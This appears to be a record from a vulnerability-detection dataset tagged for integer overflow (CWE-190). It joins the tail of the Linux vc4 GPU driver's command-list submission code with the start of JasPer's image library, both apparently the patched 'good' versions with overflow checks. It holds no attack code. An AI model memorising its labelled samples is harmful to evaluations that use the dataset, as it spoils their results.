submit_cl(dev, 1, exec->ct1ca, exec->ct1ea);
}
void
vc4_move_job_to_render(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
bool was_empty = list_empty(&vc4->render_job_list);
list_move_tail(&exec->head, &vc4->render_job_list);
if (was_empty)
vc4_submit_next_render_job(dev);
}
static void
vc4_update_bo_seqnos(struct vc4_exec_info *exec, uint64_t seqno)
{
struct vc4_bo *bo;
unsigned i;
for (i = 0; i < exec->bo_count; i++) {
bo = to_vc4_bo(&exec->bo[i]->base);
bo->seqno = seqno;
}
list_for_each_entry(bo, &exec->unref_list, unref_head) {
bo->seqno = seqno;
}
for (i = 0; i < exec->rcl_write_bo_count; i++) {
bo = to_vc4_bo(&exec->rcl_write_bo[i]->base);
bo->write_seqno = seqno;
}
}
/* Queues a struct vc4_exec_info for execution. If no job is
* currently executing, then submits it.
*
* Unlike most GPUs, our hardware only handles one command list at a
* time. To queue multiple jobs at once, we'd need to edit the
* previous command list to have a jump to the new one at the end, and
* then bump the end address. That's a change for a later date,
* though.
*/
static void
vc4_queue_submit(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
uint64_t seqno;
unsigned long irqflags;
spin_lock_irqsave(&vc4->job_lock, irqflags);
seqno = ++vc4->emit_seqno;
exec->seqno = seqno;
vc4_update_bo_seqnos(exec, seqno);
list_add_tail(&exec->head, &vc4->bin_job_list);
/* If no job was executing, kick ours off. Otherwise, it'll
* get started when the previous job's flush done interrupt
* occurs.
*/
if (vc4_first_bin_job(vc4) == exec) {
vc4_submit_next_bin_job(dev);
vc4_queue_hangcheck(dev);
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
/**
* Looks up a bunch of GEM handles for BOs and stores the array for
* use in the command validator that actually writes relocated
* addresses pointing to them.
*/
static int
vc4_cl_lookup_bos(struct drm_device *dev,
struct drm_file *file_priv,
struct vc4_exec_info *exec)
{
struct drm_vc4_submit_cl *args = exec->args;
uint32_t *handles;
int ret = 0;
int i;
exec->bo_count = args->bo_handle_count;
if (!exec->bo_count) {
/* See comment on bo_index for why we have to check
* this.
*/
DRM_ERROR("Rendering requires BOs to validate\n");
return -EINVAL;
}
exec->bo = drm_calloc_large(exec->bo_count,
sizeof(struct drm_gem_cma_object *));
if (!exec->bo) {
DRM_ERROR("Failed to allocate validated BO pointers\n");
return -ENOMEM;
}
handles = drm_malloc_ab(exec->bo_count, sizeof(uint32_t));
if (!handles) {
ret = -ENOMEM;
DRM_ERROR("Failed to allocate incoming GEM handles\n");
goto fail;
}
if (copy_from_user(handles,
(void __user *)(uintptr_t)args->bo_handles,
exec->bo_count * sizeof(uint32_t))) {
ret = -EFAULT;
DRM_ERROR("Failed to copy in GEM handles\n");
goto fail;
}
spin_lock(&file_priv->table_lock);
for (i = 0; i < exec->bo_count; i++) {
struct drm_gem_object *bo = idr_find(&file_priv->object_idr,
handles[i]);
if (!bo) {
DRM_ERROR("Failed to look up GEM BO %d: %d\n",
i, handles[i]);
ret = -EINVAL;
spin_unlock(&file_priv->table_lock);
goto fail;
}
drm_gem_object_reference(bo);
exec->bo[i] = (struct drm_gem_cma_object *)bo;
}
spin_unlock(&file_priv->table_lock);
fail:
drm_free_large(handles);
return ret;
}
static int
vc4_get_bcl(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct drm_vc4_submit_cl *args = exec->args;
void *temp = NULL;
void *bin;
int ret = 0;
uint32_t bin_offset = 0;
uint32_t shader_rec_offset = roundup(bin_offset + args->bin_cl_size,
16);
uint32_t uniforms_offset = shader_rec_offset + args->shader_rec_size;
uint32_t exec_size = uniforms_offset + args->uniforms_size;
uint32_t temp_size = exec_size + (sizeof(struct vc4_shader_state) *
args->shader_rec_count);
struct vc4_bo *bo;
if (shader_rec_offset < args->bin_cl_size ||
uniforms_offset < shader_rec_offset ||
exec_size < uniforms_offset ||
args->shader_rec_count >= (UINT_MAX /
sizeof(struct vc4_shader_state)) ||
temp_size < exec_size) {
DRM_ERROR("overflow in exec arguments\n");
goto fail;
}
/* Allocate space where we'll store the copied in user command lists
* and shader records.
*
* We don't just copy directly into the BOs because we need to
* read the contents back for validation, and I think the
* bo->vaddr is uncached access.
*/
temp = drm_malloc_ab(temp_size, 1);
if (!temp) {
DRM_ERROR("Failed to allocate storage for copying "
"in bin/render CLs.\n");
ret = -ENOMEM;
goto fail;
}
bin = temp + bin_offset;
exec->shader_rec_u = temp + shader_rec_offset;
exec->uniforms_u = temp + uniforms_offset;
exec->shader_state = temp + exec_size;
exec->shader_state_size = args->shader_rec_count;
if (copy_from_user(bin,
(void __user *)(uintptr_t)args->bin_cl,
args->bin_cl_size)) {
ret = -EFAULT;
goto fail;
}
if (copy_from_user(exec->shader_rec_u,
(void __user *)(uintptr_t)args->shader_rec,
args->shader_rec_size)) {
ret = -EFAULT;
goto fail;
}
if (copy_from_user(exec->uniforms_u,
(void __user *)(uintptr_t)args->uniforms,
args->uniforms_size)) {
ret = -EFAULT;
goto fail;
}
bo = vc4_bo_create(dev, exec_size, true);
if (IS_ERR(bo)) {
DRM_ERROR("Couldn't allocate BO for binning\n");
ret = PTR_ERR(bo);
goto fail;
}
exec->exec_bo = &bo->base;
list_add_tail(&to_vc4_bo(&exec->exec_bo->base)->unref_head,
&exec->unref_list);
exec->ct0ca = exec->exec_bo->paddr + bin_offset;
exec->bin_u = bin;
exec->shader_rec_v = exec->exec_bo->vaddr + shader_rec_offset;
exec->shader_rec_p = exec->exec_bo->paddr + shader_rec_offset;
exec->shader_rec_size = args->shader_rec_size;
exec->uniforms_v = exec->exec_bo->vaddr + uniforms_offset;
exec->uniforms_p = exec->exec_bo->paddr + uniforms_offset;
exec->uniforms_size = args->uniforms_size;
ret = vc4_validate_bin_cl(dev,
exec->exec_bo->vaddr + bin_offset,
bin,
exec);
if (ret)
goto fail;
ret = vc4_validate_shader_recs(dev, exec);
if (ret)
goto fail;
/* Block waiting on any previous rendering into the CS's VBO,
* IB, or textures, so that pixels are actually written by the
* time we try to read them.
*/
ret = vc4_wait_for_seqno(dev, exec->bin_dep_seqno, ~0ull, true);
fail:
drm_free_large(temp);
return ret;
}
static void
vc4_complete_exec(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
unsigned i;
if (exec->bo) {
for (i = 0; i < exec->bo_count; i++)
drm_gem_object_unreference_unlocked(&exec->bo[i]->base);
drm_free_large(exec->bo);
}
while (!list_empty(&exec->unref_list)) {
struct vc4_bo *bo = list_first_entry(&exec->unref_list,
struct vc4_bo, unref_head);
list_del(&bo->unref_head);
drm_gem_object_unreference_unlocked(&bo->base.base);
}
mutex_lock(&vc4->power_lock);
if (--vc4->power_refcount == 0) {
pm_runtime_mark_last_busy(&vc4->v3d->pdev->dev);
pm_runtime_put_autosuspend(&vc4->v3d->pdev->dev);
}
mutex_unlock(&vc4->power_lock);
kfree(exec);
}
void
vc4_job_handle_completed(struct vc4_dev *vc4)
{
unsigned long irqflags;
struct vc4_seqno_cb *cb, *cb_temp;
spin_lock_irqsave(&vc4->job_lock, irqflags);
while (!list_empty(&vc4->job_done_list)) {
struct vc4_exec_info *exec =
list_first_entry(&vc4->job_done_list,
struct vc4_exec_info, head);
list_del(&exec->head);
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_complete_exec(vc4->dev, exec);
spin_lock_irqsave(&vc4->job_lock, irqflags);
}
list_for_each_entry_safe(cb, cb_temp, &vc4->seqno_cb_list, work.entry) {
if (cb->seqno <= vc4->finished_seqno) {
list_del_init(&cb->work.entry);
schedule_work(&cb->work);
}
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
static void vc4_seqno_cb_work(struct work_struct *work)
{
struct vc4_seqno_cb *cb = container_of(work, struct vc4_seqno_cb, work);
cb->func(cb);
}
int vc4_queue_seqno_cb(struct drm_device *dev,
struct vc4_seqno_cb *cb, uint64_t seqno,
void (*func)(struct vc4_seqno_cb *cb))
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
int ret = 0;
unsigned long irqflags;
cb->func = func;
INIT_WORK(&cb->work, vc4_seqno_cb_work);
spin_lock_irqsave(&vc4->job_lock, irqflags);
if (seqno > vc4->finished_seqno) {
cb->seqno = seqno;
list_add_tail(&cb->work.entry, &vc4->seqno_cb_list);
} else {
schedule_work(&cb->work);
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return ret;
}
/* Scheduled when any job has been completed, this walks the list of
* jobs that had completed and unrefs their BOs and frees their exec
* structs.
*/
static void
vc4_job_done_work(struct work_struct *work)
{
struct vc4_dev *vc4 =
container_of(work, struct vc4_dev, job_done_work);
vc4_job_handle_completed(vc4);
}
static int
vc4_wait_for_seqno_ioctl_helper(struct drm_device *dev,
uint64_t seqno,
uint64_t *timeout_ns)
{
unsigned long start = jiffies;
int ret = vc4_wait_for_seqno(dev, seqno, *timeout_ns, true);
if ((ret == -EINTR || ret == -ERESTARTSYS) && *timeout_ns != ~0ull) {
uint64_t delta = jiffies_to_nsecs(jiffies - start);
if (*timeout_ns >= delta)
*timeout_ns -= delta;
}
return ret;
}
int
vc4_wait_seqno_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct drm_vc4_wait_seqno *args = data;
return vc4_wait_for_seqno_ioctl_helper(dev, args->seqno,
&args->timeout_ns);
}
int
vc4_wait_bo_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
int ret;
struct drm_vc4_wait_bo *args = data;
struct drm_gem_object *gem_obj;
struct vc4_bo *bo;
if (args->pad != 0)
return -EINVAL;
gem_obj = drm_gem_object_lookup(file_priv, args->handle);
if (!gem_obj) {
DRM_ERROR("Failed to look up GEM BO %d\n", args->handle);
return -EINVAL;
}
bo = to_vc4_bo(gem_obj);
ret = vc4_wait_for_seqno_ioctl_helper(dev, bo->seqno,
&args->timeout_ns);
drm_gem_object_unreference_unlocked(gem_obj);
return ret;
}
/**
* Submits a command list to the VC4.
*
* This is what is called batchbuffer emitting on other hardware.
*/
int
vc4_submit_cl_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct drm_vc4_submit_cl *args = data;
struct vc4_exec_info *exec;
int ret = 0;
if ((args->flags & ~VC4_SUBMIT_CL_USE_CLEAR_COLOR) != 0) {
DRM_ERROR("Unknown flags: 0x%02x\n", args->flags);
return -EINVAL;
}
exec = kcalloc(1, sizeof(*exec), GFP_KERNEL);
if (!exec) {
DRM_ERROR("malloc failure on exec struct\n");
return -ENOMEM;
}
mutex_lock(&vc4->power_lock);
if (vc4->power_refcount++ == 0)
ret = pm_runtime_get_sync(&vc4->v3d->pdev->dev);
mutex_unlock(&vc4->power_lock);
if (ret < 0) {
kfree(exec);
return ret;
}
exec->args = args;
INIT_LIST_HEAD(&exec->unref_list);
ret = vc4_cl_lookup_bos(dev, file_priv, exec);
if (ret)
goto fail;
if (exec->args->bin_cl_size != 0) {
ret = vc4_get_bcl(dev, exec);
if (ret)
goto fail;
} else {
exec->ct0ca = 0;
exec->ct0ea = 0;
}
ret = vc4_get_rcl(dev, exec);
if (ret)
goto fail;
/* Clear this out of the struct we'll be putting in the queue,
* since it's part of our stack.
*/
exec->args = NULL;
vc4_queue_submit(dev, exec);
/* Return the seqno for our job. */
args->seqno = vc4->emit_seqno;
return 0;
fail:
vc4_complete_exec(vc4->dev, exec);
return ret;
}
void
vc4_gem_init(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
INIT_LIST_HEAD(&vc4->bin_job_list);
INIT_LIST_HEAD(&vc4->render_job_list);
INIT_LIST_HEAD(&vc4->job_done_list);
INIT_LIST_HEAD(&vc4->seqno_cb_list);
spin_lock_init(&vc4->job_lock);
INIT_WORK(&vc4->hangcheck.reset_work, vc4_reset_work);
setup_timer(&vc4->hangcheck.timer,
vc4_hangcheck_elapsed,
(unsigned long)dev);
INIT_WORK(&vc4->job_done_work, vc4_job_done_work);
mutex_init(&vc4->power_lock);
}
void
vc4_gem_destroy(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Waiting for exec to finish would need to be done before
* unregistering V3D.
*/
WARN_ON(vc4->emit_seqno != vc4->finished_seqno);
/* V3D should already have disabled its interrupt and cleared
* the overflow allocation registers. Now free the object.
*/
if (vc4->overflow_mem) {
drm_gem_object_unreference_unlocked(&vc4->overflow_mem->base.base);
vc4->overflow_mem = NULL;
}
if (vc4->hang_state)
vc4_free_hang_state(dev, vc4->hang_state);
vc4_bo_cache_destroy(dev);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3121_0 |
crossvul-cpp_data_good_5400_1 | /*
* Copyright (c) 1999-2000 Image Power, Inc. and the University of
* British Columbia.
* Copyright (c) 2001-2003 Michael David Adams.
* All rights reserved.
*/
/* __START_OF_JASPER_LICENSE__
*
* JasPer License Version 2.0
*
* Copyright (c) 2001-2006 Michael David Adams
* Copyright (c) 1999-2000 Image Power, Inc.
* Copyright (c) 1999-2000 The University of British Columbia
*
* All rights reserved.
*
* Permission is hereby granted, free of charge, to any person (the
* "User") obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge,
* publish, distribute, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the
* following conditions:
*
* 1. The above copyright notices and this permission notice (which
* includes the disclaimer below) shall be included in all copies or
* substantial portions of the Software.
*
* 2. The name of a copyright holder shall not be used to endorse or
* promote products derived from the Software without specific prior
* written permission.
*
* THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS
* LICENSE. NO USE OF THE SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER
* THIS DISCLAIMER. THE SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS
* "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
* BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO
* EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
* INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
* FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
* NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
* WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. NO ASSURANCES ARE
* PROVIDED BY THE COPYRIGHT HOLDERS THAT THE SOFTWARE DOES NOT INFRINGE
* THE PATENT OR OTHER INTELLECTUAL PROPERTY RIGHTS OF ANY OTHER ENTITY.
* EACH COPYRIGHT HOLDER DISCLAIMS ANY LIABILITY TO THE USER FOR CLAIMS
* BROUGHT BY ANY OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL
* PROPERTY RIGHTS OR OTHERWISE. AS A CONDITION TO EXERCISING THE RIGHTS
* GRANTED HEREUNDER, EACH USER HEREBY ASSUMES SOLE RESPONSIBILITY TO SECURE
* ANY OTHER INTELLECTUAL PROPERTY RIGHTS NEEDED, IF ANY. THE SOFTWARE
* IS NOT FAULT-TOLERANT AND IS NOT INTENDED FOR USE IN MISSION-CRITICAL
* SYSTEMS, SUCH AS THOSE USED IN THE OPERATION OF NUCLEAR FACILITIES,
* AIRCRAFT NAVIGATION OR COMMUNICATION SYSTEMS, AIR TRAFFIC CONTROL
* SYSTEMS, DIRECT LIFE SUPPORT MACHINES, OR WEAPONS SYSTEMS, IN WHICH
* THE FAILURE OF THE SOFTWARE OR SYSTEM COULD LEAD DIRECTLY TO DEATH,
* PERSONAL INJURY, OR SEVERE PHYSICAL OR ENVIRONMENTAL DAMAGE ("HIGH
* RISK ACTIVITIES"). THE COPYRIGHT HOLDERS SPECIFICALLY DISCLAIM ANY
* EXPRESS OR IMPLIED WARRANTY OF FITNESS FOR HIGH RISK ACTIVITIES.
*
* __END_OF_JASPER_LICENSE__
*/
/*
* Image Library
*
* $Id$
*/
/******************************************************************************\
* Includes.
\******************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <ctype.h>
#include <inttypes.h>
#include <stdbool.h>
#include "jasper/jas_math.h"
#include "jasper/jas_image.h"
#include "jasper/jas_malloc.h"
#include "jasper/jas_string.h"
#include "jasper/jas_debug.h"
/******************************************************************************\
* Types.
\******************************************************************************/
#define FLOORDIV(x, y) ((x) / (y))
/******************************************************************************\
* Local prototypes.
\******************************************************************************/
static jas_image_cmpt_t *jas_image_cmpt_create0(void);
static void jas_image_cmpt_destroy(jas_image_cmpt_t *cmpt);
static jas_image_cmpt_t *jas_image_cmpt_create(int_fast32_t tlx,
int_fast32_t tly, int_fast32_t hstep, int_fast32_t vstep,
int_fast32_t width, int_fast32_t height, uint_fast16_t depth, bool sgnd,
uint_fast32_t inmem);
static void jas_image_setbbox(jas_image_t *image);
static jas_image_cmpt_t *jas_image_cmpt_copy(jas_image_cmpt_t *cmpt);
static int jas_image_growcmpts(jas_image_t *image, int maxcmpts);
static uint_fast32_t inttobits(jas_seqent_t v, int prec, bool sgnd);
static jas_seqent_t bitstoint(uint_fast32_t v, int prec, bool sgnd);
static int putint(jas_stream_t *out, int sgnd, int prec, long val);
static int getint(jas_stream_t *in, int sgnd, int prec, long *val);
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry);
static long uptomult(long x, long y);
static long downtomult(long x, long y);
static long convert(long val, int oldsgnd, int oldprec, int newsgnd,
int newprec);
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry);
/******************************************************************************\
* Global data.
\******************************************************************************/
static int jas_image_numfmts = 0;
static jas_image_fmtinfo_t jas_image_fmtinfos[JAS_IMAGE_MAXFMTS];
/******************************************************************************\
* Create and destroy operations.
\******************************************************************************/
jas_image_t *jas_image_create(int numcmpts, jas_image_cmptparm_t *cmptparms,
int clrspc)
{
jas_image_t *image;
uint_fast32_t rawsize;
uint_fast32_t inmem;
int cmptno;
jas_image_cmptparm_t *cmptparm;
if (!(image = jas_image_create0())) {
return 0;
}
image->clrspc_ = clrspc;
image->maxcmpts_ = numcmpts;
image->inmem_ = true;
/* Allocate memory for the per-component information. */
if (!(image->cmpts_ = jas_alloc2(image->maxcmpts_,
sizeof(jas_image_cmpt_t *)))) {
jas_image_destroy(image);
return 0;
}
/* Initialize in case of failure. */
for (cmptno = 0; cmptno < image->maxcmpts_; ++cmptno) {
image->cmpts_[cmptno] = 0;
}
/* Compute the approximate raw size of the image. */
rawsize = 0;
for (cmptno = 0, cmptparm = cmptparms; cmptno < numcmpts; ++cmptno,
++cmptparm) {
rawsize += cmptparm->width * cmptparm->height *
(cmptparm->prec + 7) / 8;
}
/* Decide whether to buffer the image data in memory, based on the
raw size of the image. */
inmem = (rawsize < JAS_IMAGE_INMEMTHRESH);
/* Create the individual image components. */
for (cmptno = 0, cmptparm = cmptparms; cmptno < numcmpts; ++cmptno,
++cmptparm) {
if (!(image->cmpts_[cmptno] = jas_image_cmpt_create(cmptparm->tlx,
cmptparm->tly, cmptparm->hstep, cmptparm->vstep,
cmptparm->width, cmptparm->height, cmptparm->prec,
cmptparm->sgnd, inmem))) {
jas_image_destroy(image);
return 0;
}
++image->numcmpts_;
}
/* Determine the bounding box for all of the components on the
reference grid (i.e., the image area) */
jas_image_setbbox(image);
return image;
}
jas_image_t *jas_image_create0()
{
jas_image_t *image;
if (!(image = jas_malloc(sizeof(jas_image_t)))) {
return 0;
}
image->tlx_ = 0;
image->tly_ = 0;
image->brx_ = 0;
image->bry_ = 0;
image->clrspc_ = JAS_CLRSPC_UNKNOWN;
image->numcmpts_ = 0;
image->maxcmpts_ = 0;
image->cmpts_ = 0;
image->inmem_ = true;
image->cmprof_ = 0;
return image;
}
jas_image_t *jas_image_copy(jas_image_t *image)
{
jas_image_t *newimage;
int cmptno;
if (!(newimage = jas_image_create0())) {
goto error;
}
if (jas_image_growcmpts(newimage, image->numcmpts_)) {
goto error;
}
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
if (!(newimage->cmpts_[cmptno] = jas_image_cmpt_copy(image->cmpts_[cmptno]))) {
goto error;
}
++newimage->numcmpts_;
}
jas_image_setbbox(newimage);
if (image->cmprof_) {
if (!(newimage->cmprof_ = jas_cmprof_copy(image->cmprof_)))
goto error;
}
return newimage;
error:
if (newimage) {
jas_image_destroy(newimage);
}
return 0;
}
static jas_image_cmpt_t *jas_image_cmpt_create0()
{
jas_image_cmpt_t *cmpt;
if (!(cmpt = jas_malloc(sizeof(jas_image_cmpt_t)))) {
return 0;
}
memset(cmpt, 0, sizeof(jas_image_cmpt_t));
cmpt->type_ = JAS_IMAGE_CT_UNKNOWN;
return cmpt;
}
static jas_image_cmpt_t *jas_image_cmpt_copy(jas_image_cmpt_t *cmpt)
{
jas_image_cmpt_t *newcmpt;
if (!(newcmpt = jas_image_cmpt_create0())) {
return 0;
}
newcmpt->tlx_ = cmpt->tlx_;
newcmpt->tly_ = cmpt->tly_;
newcmpt->hstep_ = cmpt->hstep_;
newcmpt->vstep_ = cmpt->vstep_;
newcmpt->width_ = cmpt->width_;
newcmpt->height_ = cmpt->height_;
newcmpt->prec_ = cmpt->prec_;
newcmpt->sgnd_ = cmpt->sgnd_;
newcmpt->cps_ = cmpt->cps_;
newcmpt->type_ = cmpt->type_;
if (!(newcmpt->stream_ = jas_stream_memopen(0, 0))) {
goto error;
}
if (jas_stream_seek(cmpt->stream_, 0, SEEK_SET)) {
goto error;
}
if (jas_stream_copy(newcmpt->stream_, cmpt->stream_, -1)) {
goto error;
}
if (jas_stream_seek(newcmpt->stream_, 0, SEEK_SET)) {
goto error;
}
return newcmpt;
error:
if (newcmpt) {
jas_image_cmpt_destroy(newcmpt);
}
return 0;
}
void jas_image_destroy(jas_image_t *image)
{
int i;
if (image->cmpts_) {
for (i = 0; i < image->numcmpts_; ++i) {
jas_image_cmpt_destroy(image->cmpts_[i]);
image->cmpts_[i] = 0;
}
jas_free(image->cmpts_);
}
if (image->cmprof_)
jas_cmprof_destroy(image->cmprof_);
jas_free(image);
}
static jas_image_cmpt_t *jas_image_cmpt_create(int_fast32_t tlx,
int_fast32_t tly, int_fast32_t hstep, int_fast32_t vstep,
int_fast32_t width, int_fast32_t height, uint_fast16_t depth, bool sgnd,
uint_fast32_t inmem)
{
jas_image_cmpt_t *cmpt;
size_t size;
cmpt = 0;
if (width < 0 || height < 0 || hstep <= 0 || vstep <= 0) {
goto error;
}
if (!jas_safe_intfast32_add(tlx, width, 0) ||
!jas_safe_intfast32_add(tly, height, 0)) {
goto error;
}
if (!(cmpt = jas_malloc(sizeof(jas_image_cmpt_t)))) {
goto error;
}
cmpt->type_ = JAS_IMAGE_CT_UNKNOWN;
cmpt->tlx_ = tlx;
cmpt->tly_ = tly;
cmpt->hstep_ = hstep;
cmpt->vstep_ = vstep;
cmpt->width_ = width;
cmpt->height_ = height;
cmpt->prec_ = depth;
cmpt->sgnd_ = sgnd;
cmpt->stream_ = 0;
cmpt->cps_ = (depth + 7) / 8;
// Compute the number of samples in the image component, while protecting
// against overflow.
// size = cmpt->width_ * cmpt->height_ * cmpt->cps_;
if (!jas_safe_size_mul(cmpt->width_, cmpt->height_, &size) ||
!jas_safe_size_mul(size, cmpt->cps_, &size)) {
goto error;
}
cmpt->stream_ = (inmem) ? jas_stream_memopen2(0, size) :
jas_stream_tmpfile();
if (!cmpt->stream_) {
goto error;
}
/* Zero the component data. This isn't necessary, but it is
convenient for debugging purposes. */
/* Note: conversion of size - 1 to long can overflow */
if (jas_stream_seek(cmpt->stream_, size - 1, SEEK_SET) < 0 ||
jas_stream_putc(cmpt->stream_, 0) == EOF ||
jas_stream_seek(cmpt->stream_, 0, SEEK_SET) < 0) {
goto error;
}
return cmpt;
error:
if (cmpt) {
jas_image_cmpt_destroy(cmpt);
}
return 0;
}
static void jas_image_cmpt_destroy(jas_image_cmpt_t *cmpt)
{
if (cmpt->stream_) {
jas_stream_close(cmpt->stream_);
}
jas_free(cmpt);
}
/******************************************************************************\
* Load and save operations.
\******************************************************************************/
jas_image_t *jas_image_decode(jas_stream_t *in, int fmt, char *optstr)
{
jas_image_fmtinfo_t *fmtinfo;
jas_image_t *image;
image = 0;
/* If possible, try to determine the format of the input data. */
if (fmt < 0) {
if ((fmt = jas_image_getfmt(in)) < 0)
goto error;
}
/* Is it possible to decode an image represented in this format? */
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt)))
goto error;
if (!fmtinfo->ops.decode)
goto error;
/* Decode the image. */
if (!(image = (*fmtinfo->ops.decode)(in, optstr)))
goto error;
/* Create a color profile if needed. */
if (!jas_clrspc_isunknown(image->clrspc_) &&
!jas_clrspc_isgeneric(image->clrspc_) && !image->cmprof_) {
if (!(image->cmprof_ =
jas_cmprof_createfromclrspc(jas_image_clrspc(image))))
goto error;
}
return image;
error:
if (image)
jas_image_destroy(image);
return 0;
}
int jas_image_encode(jas_image_t *image, jas_stream_t *out, int fmt, char *optstr)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt))) {
return -1;
}
return (fmtinfo->ops.encode) ? (*fmtinfo->ops.encode)(image, out,
optstr) : (-1);
}
/******************************************************************************\
* Component read and write operations.
\******************************************************************************/
int jas_image_readcmpt(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
jas_matrix_t *data)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
int k;
jas_seqent_t v;
int c;
jas_seqent_t *dr;
jas_seqent_t *d;
int drs;
if (cmptno < 0 || cmptno >= image->numcmpts_) {
return -1;
}
cmpt = image->cmpts_[cmptno];
if (x >= cmpt->width_ || y >= cmpt->height_ ||
x + width > cmpt->width_ ||
y + height > cmpt->height_) {
return -1;
}
if (!jas_matrix_numrows(data) || !jas_matrix_numcols(data)) {
return -1;
}
if (jas_matrix_numrows(data) != height || jas_matrix_numcols(data) != width) {
if (jas_matrix_resize(data, height, width)) {
return -1;
}
}
dr = jas_matrix_getref(data, 0, 0);
drs = jas_matrix_rowstep(data);
for (i = 0; i < height; ++i, dr += drs) {
d = dr;
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0) {
return -1;
}
for (j = width; j > 0; --j, ++d) {
v = 0;
for (k = cmpt->cps_; k > 0; --k) {
if ((c = jas_stream_getc(cmpt->stream_)) == EOF) {
return -1;
}
v = (v << 8) | (c & 0xff);
}
*d = bitstoint(v, cmpt->prec_, cmpt->sgnd_);
}
}
return 0;
}
int jas_image_writecmpt(jas_image_t *image, int cmptno, jas_image_coord_t x, jas_image_coord_t y, jas_image_coord_t width,
jas_image_coord_t height, jas_matrix_t *data)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
jas_seqent_t *d;
jas_seqent_t *dr;
int drs;
jas_seqent_t v;
int k;
int c;
if (cmptno < 0 || cmptno >= image->numcmpts_) {
return -1;
}
cmpt = image->cmpts_[cmptno];
if (x >= cmpt->width_ || y >= cmpt->height_ ||
x + width > cmpt->width_ ||
y + height > cmpt->height_) {
return -1;
}
if (!jas_matrix_numrows(data) || !jas_matrix_numcols(data)) {
return -1;
}
if (jas_matrix_numrows(data) != height || jas_matrix_numcols(data) != width) {
return -1;
}
dr = jas_matrix_getref(data, 0, 0);
drs = jas_matrix_rowstep(data);
for (i = 0; i < height; ++i, dr += drs) {
d = dr;
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0) {
return -1;
}
for (j = width; j > 0; --j, ++d) {
v = inttobits(*d, cmpt->prec_, cmpt->sgnd_);
for (k = cmpt->cps_; k > 0; --k) {
c = (v >> (8 * (cmpt->cps_ - 1))) & 0xff;
if (jas_stream_putc(cmpt->stream_,
(unsigned char) c) == EOF) {
return -1;
}
v <<= 8;
}
}
}
return 0;
}
/******************************************************************************\
* File format operations.
\******************************************************************************/
void jas_image_clearfmts()
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0; i < jas_image_numfmts; ++i) {
fmtinfo = &jas_image_fmtinfos[i];
if (fmtinfo->name) {
jas_free(fmtinfo->name);
fmtinfo->name = 0;
}
if (fmtinfo->ext) {
jas_free(fmtinfo->ext);
fmtinfo->ext = 0;
}
if (fmtinfo->desc) {
jas_free(fmtinfo->desc);
fmtinfo->desc = 0;
}
}
jas_image_numfmts = 0;
}
int jas_image_addfmt(int id, char *name, char *ext, char *desc,
jas_image_fmtops_t *ops)
{
jas_image_fmtinfo_t *fmtinfo;
assert(id >= 0 && name && ext && ops);
if (jas_image_numfmts >= JAS_IMAGE_MAXFMTS) {
return -1;
}
fmtinfo = &jas_image_fmtinfos[jas_image_numfmts];
fmtinfo->id = id;
if (!(fmtinfo->name = jas_strdup(name))) {
return -1;
}
if (!(fmtinfo->ext = jas_strdup(ext))) {
jas_free(fmtinfo->name);
return -1;
}
if (!(fmtinfo->desc = jas_strdup(desc))) {
jas_free(fmtinfo->name);
jas_free(fmtinfo->ext);
return -1;
}
fmtinfo->ops = *ops;
++jas_image_numfmts;
return 0;
}
